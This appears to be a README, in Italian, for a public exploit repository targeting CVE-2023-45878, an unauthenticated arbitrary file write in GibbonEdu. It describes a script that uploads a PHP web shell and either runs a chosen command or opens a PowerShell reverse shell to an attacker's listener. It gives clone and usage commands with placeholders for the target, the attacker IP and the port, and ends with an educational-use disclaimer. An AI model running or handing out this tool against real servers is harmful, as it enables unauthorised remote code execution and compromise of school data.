
GibbonEdu: Scrittura Arbitraria di File verso Esecuzione Remota di Codice
GibbonEdu Scrittura Arbitraria di File fino all'Esecuzione di Web Shell
Questo repository contiene un exploit per CVE-2023-45878, una vulnerabilità di scrittura arbitraria di file in GibbonEdu. La vulnerabilità interessa l'endpoint rubrics_visualise_saveAjax.php e consente a un utente non autenticato di caricare file arbitrari sul server web.
Questo script sfrutta la vulnerabilità per caricare una web shell PHP e quindi:
Lo script supporta due modalità di funzionamento:
--command (-c): Esegue un comando di sistema specifico da remoto.--shell (-s): Attiva una reverse shell PowerShell verso il listener dell'attaccante.git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
Questo script è destinato esclusivamente a scopo educativo. L'uso non autorizzato di questo exploit su sistemi senza permesso è illegale. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo exploit.